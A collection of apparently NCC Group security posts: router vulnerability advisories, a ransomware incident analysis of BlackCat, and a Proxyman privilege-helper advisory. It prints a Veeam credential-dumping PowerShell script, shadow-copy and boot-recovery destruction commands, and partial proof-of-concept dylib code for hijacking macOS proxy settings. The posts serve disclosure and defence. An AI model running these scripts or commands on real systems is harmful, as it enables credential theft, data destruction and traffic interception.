When including user submitted data in responses to end users, encode the output based on the appropriate context of where the output is included.

Content placed into HTML needs to be HTML-encoded. To work in all situations, HTML encoding functions should encode the following characters: single and double quotes, backticks, angle brackets, forward and backslashes, equals signs, and ampersands. User-submitted data should not be included in dynamically-generated JavaScript snippets. Instead, encode and return the content in a separate HTML element or API request.

Admin Panel Account Lockout and Rate Limiting Bypass (CVE-2023-24051)

Vendor: Connectize
Vendor URL: https://iconnectize.com/
Versions affected: All versions up to and including 641.139.1.1256
Systems Affected: Connectize AC21000 Dual Band Gigabit Wi-Fi Router, Model G6
Author: Jay Houppermans
CVE Identifier: CVE-2023-24051
Severity: Medium 4.3 (CVSS v3.1 AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N)

Summary

Applications often make use of rate limiting to prevent brute-force password attempts, sometimes enforced via “locking out” a user and preventing them from making further attempts at guessing the password. The Connectize G6 admin panel contains this functionality, but enforces it on the client-side. This allows a user to bypass it in two different ways.

Impact

An attacker attempting to guess the admin password for the router could make as many attempts as they wish without any limitations or restrictions. Given that the minimum password length is 5 characters, an attacker’s ability to guess the admin password is only limited by their network speed. An attacker with a sufficiently good connection could iterate through all possible five-character passwords reasonably quickly, gaining complete control of the admin panel if a password of minimum length was set.

Details

There are two methods to bypass the lockout functionality. Anyone accessing the user interface at 192.168.5.1 via a web browser may attempt to guess the password. After three failed attempts, a popup informs the user they must wait 180 seconds before guessing again.

If the user then refreshes the page, the popup is no longer shown, and the user may make another guess. If this guess is correct, the user is logged in to the admin panel, bypassing the lockout.

Alternatively, a user submitting HTTP requests directly to the application, such as through tools like Burp Suite or Postman, is never shown this prompt to begin with. Failed login requests return a HTTP 302 redirecting the user to the login page, while successful ones redirect the user to the index of the application.

An attacker could trivially automate sending hundreds or thousands of requests in this way, and never encounter the lockout mechanism.

Recommendation

Ensure that the rate limiting is implemented in the application’s server side code, rather than the client side JavaScript. They should also prevent both of these bypasses from occurring, and help mitigate brute force attacks against the application.

Current Password Not Required When Changing Admin Password (CVE-2023-24052)

Vendor: Connectize
Vendor URL: https://iconnectize.com/
Versions affected: All versions up to and including 641.139.1.1256
Systems Affected: Connectize AC21000 Dual Band Gigabit Wi-Fi Router, Model G6
Author: Jay Houppermans
CVE Identifier: CVE-2023-24052
Severity: Medium 4.3 (CVSS v3.1 AV:A/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N)

Summary

The admin panel web application does not require the user to provide the current admin password when changing the credentials.

Impact

An attacker who has gained access to the admin panel without obtaining the credentials first could change the password, locking out the legitimate users and granting themselves indefinite access until the device is factory reset.

Details

It is considered best practice to require a user to authenticate before changing or accessing sensitive information, such as an administrative password. A user who gains access to the admin panel via an unrelated vulnerability, or via access to a logged in computer owned by the legitimate user, could trivially change the password.

Given that the admin panel is also vulnerable to CSRF attacks, as described in CVE-2023-24048, this in effect allows anyone who is successful in a CSRF phishing attempt to change the admin password.

Recommendation

Require users to provide the old password when they change the administrator password.

Disclosure Timeline

March 3rd, 2023: NCC reached out to Connectize, announcing to the vendor that vulnerabilities were found in one of their devices and attempting to initiate secure conversation regarding these vulnerabilities.

April 7th, 2023: NCC reached out to Connectize again (not having heard from them in response to the prior email) to inform them of intent to publicly disclose the bugs unless they can confirm they respond to us within the next 30 days.

As of the publishing date of this Technical Advisory, no further communication has occurred and it appears that the Connectize vendor has ceased trading.

It is important that consumers are aware of the vulnerable Connectize devices. Any current owners and users of Connectize devices should seek to replace them with a different, more secure brand of device as soon as possible, since the vulnerabilities present in these devices will never be fixed as a result of the vendor no longer existing. Similarly, for consumers looking to purchase a Wi-Fi router – be aware that at the time of writing, many popular online stores still stock and sell these vulnerable Connectize devices. In the background NCC Group is currently liaising with some of these online stores in an attempt at ensuring these devices are withdrawn from sale.

Thanks to

David Goldsmith, Nicholas Bidron, and Eli Sohl for their support throughout the research and disclosure process.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Written by: Jay Houppermans

Public Report – Zcash FROST Security Assessment

23 October 2023 at 12:06

In Summer 2023, the Zcash Foundation engaged NCC Group to conduct a security
assessment of the Foundation’s FROST threshold signature implementation, based on the
paper FROST: Flexible Round-Optimized Schnorr Threshold Signatures. This project
implements v12 of the draft FROST specification in Rust, with a variety of options available
for underlying elliptic curve groups. The review was performed by three consultants over 25 person-days of effort. The project concluded with a retest phase a few weeks after the original engagement that confirmed all findings were fixed.

Unveiling the Dark Side: A Deep Dive into Active Ransomware Families 

Not so lucky: BlackCat is back! 

Authors: Alex Jessop @ThisIsFineChief , Molly Dewis 

While the main trend in the cyber threat landscape in recent months has been MoveIt and Cl0p, NCC Groups’ Cyber Incident Response Team have also been handling multiple different ransomware groups over the same period.  

In the ever-evolving cybersecurity landscape, one consistent trend witnessed in recent years is the unsettling rise in ransomware attacks. These nefarious acts of digital extortion have left countless victims scrambling to safeguard their data, resources, and even their livelihoods. To counter this threat, every person in the cyber security theatre has a responsibility to shine light on current threat actor Tactics, Techniques and Procedures (TTP’S) to assist in improving defences and the overall threat landscape. 

 This series will  focus on TTP’s deployed by four ransomware families recently observed during NCC Group’s incident response engagements. The ransomware families that will be explored are: 

  1. BlackCat – Also known as ALPHV, first observed in 2021, is a Ransomware-as-a-Service (Raas) often using the double extortion method for monetary gain.  
  1. Donut –The D0nut extortion group was first reported in August 2022 [1] for breaching networks and demanding ransoms in return for not leaking stolen data. A few months later, reports of the group utilizing encryption as well as data exfiltration were released with speculation that the ransomware deployed by the group was linked to HelloXD ransomware [2]. There is also suspected links between D0nut affiliates and both Hive and Ragnar Locker ransomware operations.  
  1. Medusa – Not to be confused with MedusaLocker, Medusa was first observed in 2021, is a Ransomware-as-a-Service (RaaS) often using the double extortion method for monetary gain. In 2023 the groups’ activity increased with the launch of the ‘Medusa Blog’. This platform serves as a tool for leaking data belonging to victims. 
  1. NoEscape – At the end of May 2023, a newly emerged Ransomware-as-a-Service (RaaS) was observed on a cybercrime forum named NoEscape. 

Join us as we delve into the inner workings of these ransomware families, gaining a  better understanding of their motivations, attack vectors and TTPS. 

To begin our deep dive we will start with…  

Not so lucky: BlackCat is back! 

Summary

This first post will delve into a recent incident response engagement handled by NCC Group’s Cyber Incident Response Team (CIRT) involving BlackCat Ransomware.  

Below provides a summary of findings which are presented in this blog post: 

  • Installation of various services. 
  • Creation of new accounts. 
  • Modification and deletion activity.  
  • Credential dumping activity. 
  • Use of remote access applications. 
  • Data staging. 
  • Presence of MEGAsync.  
  • Analysis of the ransomware executable.

BlackCat

BlackCat ransomware, also known as ALPHV, is a Rust-based variant that was first seen in November 2021. BlackCat has been provided as a ransomware-as-a-service (RaaS) model and is an example of a double-extortion ransomware where data once encrypted, is exfiltrated and the victim is threatened to have their data published if the ransom is not paid [1]. The group behind BlackCat ransomware can be characterised as financially motivated. BlackCat ransomware targets no specific industry and has the capability to encrypt both Windows and Linux hosts. BlackCat ransomware uses AES to encrypt files or ChaCha20 if AES is not supported due to the hardware of the system [4].  

Incident Overview  

In this incident, the initial access vector was unknown. Prior to the execution of the ransomware, a wide variety of activity was observed such as the installation of new services, creation of new accounts and data staging. Data was believed to have been exfiltrated due to the techniques employed, however, no data was published to the leak site.  

Mitre TTPs  

Execution 

The threat actor installed various new services: 

  • Total Software Deployment Audit Service 
  • HWiNFO Kernel Driver 
  • ScreenConnect Client 
  • PSEXESVC 
  • AteraAgent 
  • WinRing0_1_2_0 
  • Splashtop® Remote Service

Additionally, BlackCat ransomware uses wmic.exe Shadowcopy Deleteshadow_copy to delete shadow copies.  

Persistence 

Maintaining access to the victim’s environment was achieved by the threat actor creating a new Administrator account and a new default admin user, azure.  

Additionally, a Total Software Deployment Audit Service Windows service was installed (see below); likely to maintain persistence on the affected host. Total Software Deployment supports group deployment, maintenance, and uninstallation of software packages. BlackCat ransomware is known to use Total Software Deployment [3]. 

{“EventData”:{“Data”:[{“@Name”:”ServiceName”,”#text”:”Total Software Deployment Audit Service”},{“@Name”:”ImagePath”,”#text”:”\”%SystemRoot%\\TNIWINAGENT\\tniwinagent.exe\” /service /ip:<IP ADDRESS> /login:\”current\” /driver:2″},{“@Name”:”ServiceType”,”#text”:”user mode service”},{“@Name”:”StartType”,”#text”:”demand start”},{“@Name”:”AccountName”,”#text”:”LocalSystem”}]}} 

Defence Evasion 

The threat actor utilised various techniques to hide their tracks and evade detection: 

  • Using an already existing administrator account to clear the following log files: 
    • System 
    • Windows PowerShell 
    • WitnessClientAdmin 
  • The ransomware payload, min.exe, used wevtutil.exe cl. 
  • Deleting the ransomware executable from C:\Users\azure\Desktop\min.exe. 
  • The ransomware payload, min.exe, had the capability to add this registry key to maintain persistence: 
    • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters.
  • The ransomware payload, min.exe, using fsutil behavior set SymlinkEvaluation R2R:1 to redirect file system access to a different location once access to the network is gained.

Credential Access 

Various techniques to gather credentials were employed by the threat actor.  

Due to the presence of Veeam in the victim’s environment, C:\PerfLogs\Veeam-Get-Creds.ps1 below was leveraged to recover passwords used by Veeam to connect to remote hosts.  

# About:  The script is designed to recover passwords used by Veeam to connect #         to remote hosts vSphere, Hyper-V, etc. The script is intended for  #         demonstration and academic purposes. Use with permission from the  #         system owner. # # Author: Konstantin Burov. # # Usage:  Run as administrator (elevated) in PowerShell on a host in a Veeam  #         server.  Add-Type -assembly System.Security  #Searching for connection parameters in the registry try {  $VeaamRegPath = "HKLM:\SOFTWARE\Veeam\Veeam Backup and Replication\"  $SqlDatabaseName = (Get-ItemProperty -Path $VeaamRegPath -ErrorAction Stop).SqlDatabaseName   $SqlInstanceName = (Get-ItemProperty -Path $VeaamRegPath -ErrorAction Stop).SqlInstanceName  $SqlServerName = (Get-ItemProperty -Path $VeaamRegPath -ErrorAction Stop).SqlServerName } catch {  echo "Can't find Veeam on localhost, try running as Administrator"  exit -1 }  "" "Found Veeam DB on " + $SqlServerName + "\" + $SqlInstanceName + "@ 
{  $EnryptedPWD = [Convert]::FromBase64String($_.password)  $ClearPWD = [System.Security.Cryptography.ProtectedData]::Unprotect( $EnryptedPWD, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine )  $enc = [system.text.encoding]::Default  $_.password = $enc.GetString($ClearPWD) } 

Additionally, the threat actor used ScreenConnect to transfer Mimikatz to a compromised host (see below).  

{"EventData":{"Data":"Transferred files with action 'Transfer':\nmimikatz.exe\n\nVersion: 23.4.5.8571\nExecutable Path: C:\\Program Files (x86)\\ScreenConnect Client (7d2615d1049a2b63)\\ScreenConnect.ClientService.exe\n","Binary":""}} 

Events like the above and any others related to ScreenConnect activity can be found in Application.evtx.  

Subsequently, evidence of a file named mimikatz.log was observed. It is highly likely Mimikatz was leveraged by the threat actor to harvest credentials.  

Finally, it is likely the threat actor enumerated C:\Windows\NTDS\ntds.dit as the following files were created: 1.txt.ntds, 1.txt.ntds.kerberos, 1.txt.ntds.cleartext. These files are from using Impacket [5].  

Discovery 

The threat actor used ScreenConnect to execute commands like ping <HOST NAME>.<DOMAIN NAME>.local. In some instances, the commands executed were not specified (see below) but a length of 33 can mean commands have been manually executed.  

{"EventData":{"Data":"Executed command of length: 33\n\nVersion: 23.4.5.8571\nExecutable Path: C:\\Program Files (x86)\\ScreenConnect Client (1b70ca7b560918ec)\\ScreenConnect.ClientService.exe\n","Binary":""}} 

At the same time on another host, net.exe and net1.exe were executed. As net is often used by threat actors to gather system and network information, it is possible ScreenConnect was used to gather this type of information.   

Analysis of the ransomware executable min.exe found that the UUID was obtained using: wmic csproduct get UUID. 

Lateral Movement 

The threat actor executed PsExec.exe. BlackCat has been known to use PsExec to replicate itself across connected servers [6].  

Collection 

Data staging was conducted by the threat actor as multiple .zip files were created that are believed to have been exfiltrated.  

Additionally, one of the accounts compromised by the threat actor executed WinRAR. Across the time period of interest, folders on multiple drives were modified; the threat actor potentially accessed these folders.  

Command and Control 

Remote access applications, particularly ScreenConnect, were heavily utilised by the threat actor. ScreenConnect was used to start remote sessions, execute commands and transfer files. The threat actor transferred the following files: mimikatz.exe, MEGAsyncSetup64.exe, tsd-setup.exe, 121.msi* and 212.msi*.  

*Note: Could not be recovered for analysis.   

Atera and Splashtop were also observed: 

  • c:\program files (x86)\atera networks\ateraagent\ateraagent.exe. 
  • Services: AteraAgent and WinRing0_1_2_0  
  • C:\Windows\Temp\SplashtopStreamer.exe

Atera is used for remote monitoring and management and the Atera Agent is required for hosts to be monitored. It is likely Atera was used for persistence.  

Splashtop allows hosts to be remotely accessed and was likely used for persistence especially as the Splashtop® Remote Service was observed going online. Splashtop events are also located in Application.evtx.  

Exfiltration 

Data staging was observed as a technique used by the threat actor. Multiple .zip files were created at the same time within C:\PerfLogs. It is believed these .zip files were exfiltrated.  

For one of the compromised accounts, WinRAR was observed C:\Users\<USER>\Desktop\winrar-x64-621.exe. It is possible this utility was used for data exfiltration. 

MEGAsync is a legitimate cloud storage solution, however, it is often used by threat actors for exfiltrating data. Due to its presence in the victim’s environment, it is highly likely the threat actor used MEGA to exfiltrate data.  

MEGA was observed to once reside in the following locations: 

  • C:\Users\<User>\AppData\Local\MEGAsync\MEGAsync.exe 
  • C:\Users\<User>\Documents\ConnectWiseControl\Files\MEGAsyncSetup64.exe 
  • C:\Users\<User>\Downloads\MEGAsyncSetup64.exe

Additionally, MEGA-related strings were recovered from the encrypted VMDKs: 

  • MEGAsyncSetup64.exe 
  • MEGAsync.exe 
  • MEGA Website.lnk 
  • MEGAsync.cfg.bak 
  • MEGAsync.log 
  • MEGAsync Update Task [SID] 
  • MEGAsync.lnk

Impact 

BlackCat ransomware was deployed to the affected domain in the form of min.exe. Data was encrypted and .dujcsfd was appended to files. A ransom note was dropped onto the compromised Windows servers.  

min.exe 

PsExec was highly likely used to distribute the ransomware across the affected domain as BlackCat has a built-in PsExec module [7].  

Additionally, min.exe had the following command line options: 

  • access-token: Access token. 
  • paths: Only process files inside defined paths 
  • no-net: Do not discover network shares on Windows. 
  • no-prop : Do not self propagate (worm) on Windows. 
  • no-wall: Do not update desktop wallpaper on Windows. 
  • no-impers: Do not spawn impersonated processes on Windows. 
  • no-vm-kill: Do not stop VMs on ESXI. 
  • no-vm-snapshot-kill: Do not wipe VMs snapshots on EXSI. 
  • no-vm-kill-names: Do not stop defined VMs on EXSI. 
  • sleep-restart: Sleep for duration in seconds after successful run and then restart. 
  • sleep-restart-duration: Keep soft persistence alive for duration in second. (24 hours by default). 
  • sleep-restart-until: Keep soft persistence alive until defined UTC time in millis. (Defaults to 24 hours since launch). 
  • no-prop-servers: Do not propagate to defined servers. 
  • prop-file: Propagate specified file. 
  • drop-drag-and-drop-target: Drop drag and drop target batch file. 
  • drag-and-drop: Invoked with drag and drop. 
  • log-file: Enable logging to specified file. 
  • verbose: Log to console. 
  • extra-verbose: Log more to console.  
  • ui: Show user interface. 
  • safeboot: Reboot in Safe Mode before running on Windows. 
  • safeboot-network: Reboot in Safe Mode with Networking before running on Windows. 
  • safeboot-instance: Run as safeboot instance on Windows. 
  • propagated: Run as propagated process. 
  • child: Run as child process.  
  • bypass: Run as elevated process.  

The configuration of min.exe contained 23 elements [8]: 

  • config_id: Configuration ID 
  • extension: File extension appended to files.  
  • public_key: RSA public key. 
  • note_file_name: The file name of the ransom note.  
  • note_full_text: The ransom note in full.  
  • note_short_text: A shorter version of the ransom note.  
  • Credentials: Credentials used by BlackCat. 
  • default_file_mode: File encryption mode.  
  • default_file_cipher: File encryption cipher.  
  • kill_services: The services to terminate.  
  • kill_processes: The processes to terminate.  
  • exclude_directory_names: Does not encrypt the defined directories.   
  • exclude_file_names: Does not encrypt the defined files. 
  • exclude_file_extensions: Does not encrypt the defined extensions.  
  • exclude_file_path_wildcard: Does not encrypt the defined file paths.  
  • enable_network_discovery: Enable network discovery. 
  • enable_self_propagation: Enable self propagation.  
  • enable_set_wallpaper: Enable the desktop wallpaper to be changed.
  • enable_esxi_vm_kill: Enable VM termination on EXSI. 
  • enable_esxi_vm_snapshot_kill: Enable snapshot deletion on ESXI. 
  • strict_include_paths: Hardcoded file paths to encrypt. 
  • esxi_vm_kill_exclude: VMs to cluse on EXSI hosts.  
  • sleep_restart: Sleep time before restarting.

Some of the files not encrypted include:  

  • $windows.~bt 
  • windows 
  • windows.old 
  • system volume information 
  • boot 

The files below are some of the files included in the file name exclusion list: 

  • ntuser.dat 
  • autorun.inf 
  • boot.ini 
  • desktop.ini 

Below are some of the defined extensions that are not encrypted: 

  • exe 
  • drv 
  • msc 
  • dll 
  • lock 
  • sys 
  • msu 
  • lnk

T1489 – Service Stop [9] 

min.exe uses kill_processes to stop the following processes:  

  • memtas 
  • veeam 
  • svc$ 
  • backup 
  • sql 
  • vss 
  • msexchange 

Additionally, kill_services is used to stop various services including but not limited to:  

  • excel 
  • firefox 
  • infopath 
  • isqlplussvc 
  • msaccess 
  • mspub 
  • mydesktopqos 
  • mydesktopservice 
  • notepad 
  • ocautoupds
  • ocomm 
  • ocssd 
  • onenote 
  • oracle 
  • outlook
  • powerpnt 
  • sqbcoreservice 
  • steam 
  • synctime 
  • tbirdconfig
  • thebat 
  • thunderbird 
  • visio 
  • winword 
  • wordpad 
  • xfssvccon 

T1490 – Inhibit System Recovery 

Various backups were modified by the threat actor using an already existing domain administrator account and subsequently, backups were then deleted. 

Analysis of the ransomware executable, min.exe, indicated that BlackCat uses the below Windows utilities to inhibit system recovery: 

Windows Utility Description 
wmic.exe Shadowcopy Deleteshadow_copy To delete shadow copies 
iisreset.exe /stop To stop all the running IIS services 
bcdedit /set recoveryenabled No To modify the boot configuration data 
vssadmin.exe Delete Shadows /all /quiet To delete all volume shadow copies 

T1491.001 – Defacement: Internal Defacement 

A desktop wallpaper, RECOVER-dujcsfd-FILES.txt.png, was dropped on some of the compromised Windows servers. 

Indicators of Compromise 

IOC Value Indicator Type Description  
7282dad776ad387028ae7b6d359b2d2d0b17af0e SHA1 C:\PerfLogs\min.exe (Ransomware executable) 
3E2272B916DA4BE3C120D17490423230AB62C174 SHA1 C:\PerfLogs\PsExec.exe 
DA39A3EE5E6B4B0D3255BFEF95601890AFD80709 SHA1 C:\PerfLogs\Veeam-Get-Creds.ps1 
C:\Users\<User>\Downloads\MEGAsyncSetup64.exe File Path MEGA 
C:\Program Files (x86)\ScreenConnect Client C:\Program Files (x86)\Splashtop C:\Program Files\ATERA Networks File Path Remote Access Applications 
C:\Users\<User>\Documents\ConnectWiseControl\Files\mimikatz.exe C:\Users\<User>\Documents\ConnectWiseControl\Files\MEGAsyncSetup64.exe C:\Users\<User>\Documents\ConnectWiseControl\Files\tsd-setup.exe File Path Files transferred using ScreenConnect.  

MITRE ATT CK® 

Tactic Technique ID Description  
Execution  Windows Management Instrumentation T1047 WMIC.exe is used to delete shadow copies.  
Execution  System Services: Service Execution T1569.002 Various services installed.  
Persistence Create Account: Local Account T1136.001 Creation of new accounts.  
Persistence Create or Modify System Process: Windows Service T1543.003 Total Software Deployment installed as a new service.  
Defense Evasion Indicator Removal: Clear Windows Event Logs T1070.001 Cleared logs. Ransomware payload uses wevtutil.exe cl. 
Defense Evasion  Indicator Removal: File Deletion T1070.004 The ransomware executable was deleted.  
Defense Evasion Modify Registry T1112 Adding a registry key to maintain persistence.   
Defense Evasion File and Directory Permissions Modification: Windows File and Directory Permissions Modification T1222.001 Using fsutil to redirect file system access to a different location once access to the network is gained.  
Credential Access OS Credential Dumping T1003 Using a PowerShell script to retrieve Veeam credentials.  
Credential Access OS Credential Dumping: LSASS Memory T1003.001 Mimikatz. 
Credential Access OS Credential Dumping: NTDS T1003.003 Impacket usage to enumerate the NTDS.dit. 
Discovery Remote System Discovery T1018 Ping usage. 
Discovery System Owner/User Discovery T1033 Using ScreenConnect to execute commands. 
Discovery System Information Discovery T1082 Obtain the UUID. 
Lateral Movement  Lateral Tool Transfer T1570 Execution PsExec to move laterally. 
Collection Data Staged: Local Data Staging T1074.001 Creation of multiple .zip files. 
Collection Archive Collected Data: Archive via Utility T1560.001 Observation of WinRAR. 
Command and Control Remote Access Software T1219 Presence of ScreenConnect, Atera and Splashtop 
Exfiltration  Data Staged: Local Data Staging T1074.001 Multiple .zip files within C:\PerfLogs. 
Exfiltration Exfiltration Over Web Service: Exfiltration to Cloud Storage T1567.002 Presence of MEGAsync.  
Impact  Data Encrypted for Impact T1486 Deployment of BlackCat ransomware.  
Impact Inhibit System Recovery T1490 Modification/deletion of backups.  Delete volume shadow copies. Stop running IIS services. Modify the boot configuration data. 
Impact Defacement: Internal Defacement T1491.001 RECOVER-dujcsfd-FILES.txt.png was dropped as desktop wallpaper. 

References 

[1] https://www.bleepingcomputer.com/news/security/new-donut-leaks-extortion-gang-linked-to-recent-ransomware-attacks/ 

[2] https://www.bleepingcomputer.com/news/security/donut-extortion-group-also-targets-victims-with-ransomware/&nbsp;

[3] https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/ 

[4] https://www.bleepingcomputer.com/news/security/alphv-blackcat-this-years-most-sophisticated-ransomware/ 

[5] https://twitter.com/MsftSecIntel/status/1692212191536066800 

[6] https://attack.mitre.org/software/S1068/  

[7] https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackcat  

[8] https://www.netskope.com/blog/blackcat-ransomware-tactics-and-techniques-from-a-targeted-attack 

[9] https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/ 

Technical Advisory: Insufficient Proxyman HelperTool XPC Validation

31 October 2023 at 20:03
Vendor: Proxyman LLC
Vendor URL: https://proxyman.io/
Versions affected: com.proxyman.NSProxy.HelperTool version 1.4.0 (distributed with Proxyman.app up to and including versions 4.11.0)
Systems Affected: macOS
Author: Scott Leitch <mailto:[email protected]>
Advisory URL / CVE Identifier: CVE-2023-45732
Risk: Medium (Exploitation of this finding enables an attacker to redirect network traffic to an attacker-controlled location)

Summary

The com.proxyman.NSProxy.HelperTool application (version 1.4.0), a privileged helper tool distributed with the Proxyman application (up to an including versions 4.10.1) for macOS 13 Ventura and earlier allows a local attacker to use earlier versions of the Proxyman application to maliciously change the System Proxy settings and redirect traffic to an attacker-controlled computer, facilitating MITM attacks or other passive network monitoring.

The Proxyman application affected is a macOS native desktop application used for HTTP(S) proxying. The application distribution includes a helper service tool (com.proxyman.NSProxy.HelperTool) that is used to adjust system proxy settings. The main application communicates with this higher-privilege tool over XPC.

Impact

It is possible for a low-privilege attacker or otherwise malicious process to inconspicuously change the operating system’s HTTP(S) proxy settings, facilitating, e.g., MITM attacks.

Recommendation

Update to the HelperTool version 1.5.0 or higher, distributed with the most recent (4.13.0 as of writing) version of Proxyman.

Details

Much of the below is based heavily off of previous work by Csaba Fitzl, in particular his blogs which coincided with earlier CVEs:

The HelperTool class’s implemented (BOOL)listener:(NSXPCListener *) shouldAcceptNewConnection:(NSXPCConnection *) instance method defines six code-signing requirement strings. A process attempting to establish a valid XPC connection to the installed com.proxyman.NSProxy.HelperTool must satisfy one of these requirements.

/* @class HelperTool */
-(char)listener:(void *)arg2 shouldAcceptNewConnection:(void *)arg3 {
    r14 = self;
    rax = [arg3 retain];
    r12 = rax;
    rdx = [rax processIdentifier];
    [r14 setConnectionPID:rdx];
    var_60 = @"identifier \"com.proxyman.NSProxy\" and anchor apple generic and certificate leaf[subject.CN] = \"Apple Development: Pham Huy (4G5FB38W27)\" and certificate 1[field.1.2.840.113635.100.6.2.1] /* exists */";
    *( var_60 + 0x8) = @"identifier \"com.proxyman.NSProxy-setapp\" and anchor apple generic and certificate leaf[subject.CN] = \"Apple Development: Pham Huy (4G5FB38W27)\" and certificate 1[field.1.2.840.113635.100.6.2.1] /* exists */";
    *( var_60 + 0x10) = @"identifier \"com.proxyman.NSProxy\" and anchor apple generic and certificate leaf[subject.CN] = \"Mac Developer: Pham Huy (4G5FB38W27)\" and certificate 1[field.1.2.840.113635.100.6.2.1] /* exists */";
    *( var_60 + 0x18) = @"identifier \"com.proxyman.NSProxy-setapp\" and anchor apple generic and certificate leaf[subject.CN] = \"Mac Developer: Pham Huy (4G5FB38W27)\" and certificate 1[field.1.2.840.113635.100.6.2.1] /* exists */";
    *( var_60 + 0x20) = @"anchor apple generic and identifier \"com.proxyman.NSProxy\" and (certificate leaf[field.1.2.840.113635.100.6.1.9] /* exists */ or certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = \"3X57WP8E8V\")";
    *( var_60 + 0x28) = @"anchor apple generic and identifier \"com.proxyman.NSProxy-setapp\" and (certificate leaf[field.1.2.840.113635.100.6.1.9] /* exists */ or certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = \"3X57WP8E8V\")";
    rax = [NSArray arrayWithObjects:rdx count:0x6];
    rax = [rax retain];
    r15 = rax;
    rcx = r12;
    if ([r14 [[[[validateIncomingConnectionForAllCodeSigns:rax forConnection:rcx] != 0x0]]]]) {
            rax = [NSXPCInterface interfaceWithProtocol:@protocol(HelperToolProtocol), rcx];
            rax = [rax retain];
            [r12 setExportedInterface:rax, rcx];
            [rax release];
            [r12 setExportedObject:r14, rcx];
            [r12 resume];
            r14 = 0x1;
    }

A de-compilation of the listener:shouldAcceptNewConnection: instance method defined six potential security requirements before passing them to the validateIncomingConnectionForAllCodeSigns:forConnection: instance method.

The above de-compilation shows the method grouping the six strings into an NSArray and passing them into the HelperTool‘s validateIncomingConnectionForAllCodeSigns:forConnection: instance method. Looking into this instance method, we find that it will loop through the six code-signing requirement strings, each loop calling, in succession, SecCodeCopyGuestWithAttributes(), SecRequirementCreateWithString, and SecCodeCheckValidityWithErrors to determine that the calling binary is correctly signed and conforms to one of the six allowed requirement strings.

An attacker able to pass the above security requirement check is able to communicate with the HelperTool, tasked with managing the system’s proxy settings through a series of XPC service methods. Modern distributions of the main Proxyman.app bundle are all signed with the hardened runtime flag, preventing library injection attacks that would look to take advantage of this, but an old version of Proxyman still available, version 1.3.4, is not signed with any code-signing flags, allowing an attacker to abuse it as a vector through which they can pass the above security validation check to communicate with an up-to-date HelperTool distributed with recent versions of Proxyman, surreptitiously adjusting system proxy settings.

$ codesign -dv /Volumes/Proxyman/Proxyman.app/Contents/MacOS/Proxyman
Executable=/Volumes/Proxyman/Proxyman.app/Contents/MacOS/Proxyman
Identifier=com.proxyman.NSProxy
Format=app bundle with Mach-O thin (x86_64)
CodeDirectory v=20200 size=17716 flags=0x0(none) hashes=546+5 location=embedded
Signature size=8916
Timestamp=Apr 1, 2019 at 1:19:02 AM
Info.plist entries=31
TeamIdentifier=3X57WP8E8V
Sealed Resources version=2 rules=13 files=266
Internal requirements count=1 size=212

An old version of the Proxyman (1.3.4) application was signed without flags to protect against library injections and also contained the requisite TeamIdentifier.

We can determine the exposed XPC service methods using the class-dump tool. Though there are several methods it appears we may be able to communicate using, the most simple was legacySetProxySystemPreferencesWithAuthorization:(NSData *) enabled:(BOOL) host:(NSString *) port:(NSString *) reply:(void (^)(NSError *, BOOL)):

@protocol HelperToolProtocol
- (void)overrideProxySystemWithAuthorization:(NSData *)arg1 setting:(NSDictionary *)arg2 reply:(void (^)(NSError *))arg3;
- (void)revertProxySystemWithAuthorization:(NSData *)arg1 restore:(BOOL)arg2 reply:(void (^)(NSError *))arg3;
- (void)legacySetProxySystemPreferencesWithAuthorization:(NSData *)arg1 enabled:(BOOL)arg2 host:(NSString *)arg3 port:(NSString *)arg4 reply:(void (^)(NSError *, BOOL))arg5;
- (void)getVersionWithReply:(void (^)(NSString *))arg1;
- (void)connectWithEndpointReply:(void (^)(NSXPCListenerEndpoint *))arg1;
@end

XPC service methods exposed by the com.proxyman.NSProxy.HelperTool service

Using this, it’s possible to build a dynamic library that can be force-loaded into the old Proxyman application that will, on startup, call to the XPC service and set the system’s proxy settings to attacker-controlled values. Some important code snippets are included below, with a full proof-of-concept source file included below.

@protocol HelperToolProtocol                                                        
- (void) legacySetProxySystemPreferencesWithAuthorization:(NSData *)auth_data       
    enabled:(BOOL)enabled host:(NSString *)host port:(NSString *)port               
    reply:(void (^)(NSError *, BOOL))reply;                                         
- (void) getVersionWithReply:(void (^)(NSString *))reply;                           
@end

The target HelperToolProtocol instance methods were included in the dynamic library.

    [obj legacySetProxySystemPreferencesWithAuthorization:authorization             
        enabled:enab                                                                
        host:host                                                                   
        port:port                                                                   
        reply:^(NSError * err, BOOL b) {                                            
            if (err != NULL) {                                                      
                NSLog(@"[!] Error: %@", err);                                       
                exit(1);                                                            
            } else {                                                                
                NSLog(@"[+] Proxy set successfully!");                               
            }                                                                       
        }                                                                           
    ];                                                                              

    [obj getVersionWithReply:^(NSString * reply) {                                  
        NSLog(@"[+] HelperTool Version: %@", reply);                                
    }];                                                                             

    [NSThread sleepForTimeInterval:0.5f];                                           
    NSLog(@"[+] Done.");

    while (1) {
        sleep(5);
    };

Once authorization checks were passed, the dynamic library called the legacySetProxySystemPreferencesWithAuthorization and getVersionWithReply instance methods.

Once we compile the dynamic library we can then insert it into the old Proxyman application:

clang -dynamiclib -x objective-c -framework Foundation -framework Security -o ProxyHelper_PoC.dylib ./ProxyHelper_PoC.m

And using the below shell script ($ ./Poc.sh ./ProxyHelper_PoC.dylib <host> <port>), it is possible to execute the proof-of-concept exploitation against a fully updated Proxyman installation, changing the system’s proxy settings:

#!/bin/sh
# Proyman HelperTool PoC
VERSION="1.3.4"
